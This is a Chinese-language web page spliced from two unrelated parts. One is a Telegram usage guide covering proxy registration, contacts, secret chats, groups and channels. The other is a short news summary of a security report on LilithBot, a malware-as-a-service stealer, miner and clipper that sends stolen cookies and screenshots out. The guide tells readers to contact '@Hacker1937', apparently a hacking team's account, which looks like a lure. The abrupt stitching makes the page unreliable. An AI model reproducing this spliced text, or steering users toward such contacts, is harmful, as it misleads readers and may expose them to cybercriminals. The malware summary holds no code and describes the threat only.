不外在验证的时间，需要请求网络，而由于Teleram被墙不能直接访问，以是需要使用翻墙软件，假如你使用的是VPN，则默认是全局代理，也不会有任何问题。 2.1 打开Telegram，点击“start messaging”； 2.2 输入手机号，点击右上角“Next”，会提示网络错误； 2.3 切换到Safari浏览器，将上面楼的[代|理]粘贴进地址栏，然后“前往”访问；然后，浏览器弹出提示框：在 “Telegram” 中打开链接吗？，点击“打开”，自动跳转到Telegram； 2.4 点击“Connect Pr0xy”，[代|理]就成功添加到App中了。之后，继续之前的注册流程，即可收到验证码（短信验证码可能要等待1分钟），开启你的电报之旅。 如何添加联系人 电报（Telegram）上加好友可能比较麻烦，因为无法像微信那样直接扫描二维码。 例如添加我们团队的TG，在您注册好的情况下，直接搜索：@Hacker1937 即可。 以安卓手机为例，点击界面左上的菜单图标，在选项中点击 “联系人”（Contacts），打开时会弹出界面要求访问手机通讯录来获取手机联系人，如果允许的话，就点击继续。点击通讯录里的联系人，就可以添加好友了，如果对方没有使用电报，可以向他发送邀请。 如果想加的好友不在你的通讯录中，可以点击 “联系人”（Contacts）界面右上角的加号，然后会看到新的界面，让你输入对方的手机号来加对方为好友。也可以通过搜索好友的 Telegram 用户名来加联系人。点击 “联系人”（Contacts）界面上方的放大镜图标，然后输入对方的用户名就好了。 如何和好友聊天 以安卓手机为例，点击界面左上角的菜单图标，在菜单中点 “联系人”（Contacts）打开联系人列表，点击想要聊天的好友，就可以加入聊天界面了。 如何加密聊天 Telegram 最好用的一个功能就是加密聊天，可以保证聊天内容的私密性，聊天内容是加密存储的，除了聊天双方之外，别人不会知道你们的聊天内容，即使是 Telegram 的后台人员也无法看到聊天内容。这个功能在其他聊天软件是没有的。 使用方法：以手机版 Telegram 为例，点击页面左上角的菜单图标，在菜单中点击 “新建加密对话”，然后选择联系人就可以开始加密聊天了。 如何加入电报群 电报群类似于微信群，不同的是电报群对人数没有500人的限制，一些电报群动不动就几千上万的人数。电报群还分为公开群和私密群，私密群类似于微信群，需要群主邀请才能加入，而且加入后无法看到群组之前的聊天记录。如果想加入公开群，比如: newbie_chat，可以在 Telegram 的主界面，最上面的搜索栏输入 @newbie_chat，然后下面的结果中就会出现这个群，点击就进入群组了。然后按屏幕下面的 “加入”（Join）按钮就可以加入这个电宝群了。另外，还可以通过网页进入群组，在浏览器中输入 t.me/newbie_chat, 然后就会自动转到 Telegram 应用，然后就进入该群组了。本文的第三个部分提供了电报 Telegram 的群组汇总，帮助你快速找到感兴趣的电报群组。 如何订阅频道 Telegram 还有个频道功能（Channel），其实也属于电报群的一种，用户可以订阅但是不能发言，类似微信公众号。和群组一样，电报频道也有一个公开的地址，如：t.me/features，这个频道会发布 Telegram 的最新功能。如果想订阅这个频道，进入 Telegram 主界面，在最上面的搜索框中输入 @features，然后在下面的结果中就会出现这个频道，点击就可以进入这个频道了。同样，点击界面下方的 “加入”（Join）按钮，就可以订阅这个频道了。

被称为 Eternity Group 的恶意软件即服务 (MaaS) 背后的威胁行为者与名为LilithBot的新恶意软件有关。 Zscaler ThreatLabz 研究人员 Shatak Jain 和 Aditya Sharma在周三的一份报告中说： “它具有可用作矿工、窃取器和剪裁器的先进功能以及其持久性机制。” “该组织一直在不断增强恶意软件，增加反调试和反虚拟机检查等改进。” Eternity Project于今年早些时候出现，在 Telegram 频道上宣传其warez 和产品更新。提供的服务包括窃取者、矿工、剪辑器、勒索软件、USB 蠕虫和 DDoS 机器人。 LilithBot 是此列表的最新成员。与其同行一样，多功能恶意软件机器人以订阅的方式出售给其他网络犯罪分子，以换取加密货币付款。 成功入侵后，通过机器人收集的信息（浏览器历史记录、cookie、图片和屏幕截图）被压缩到 ZIP 存档（“report.zip”）中并泄露到远程服务器。 这一发展表明 Eternity Project 正在积极扩展其恶意软件库，更不用说采用复杂的技术来绕过检测了。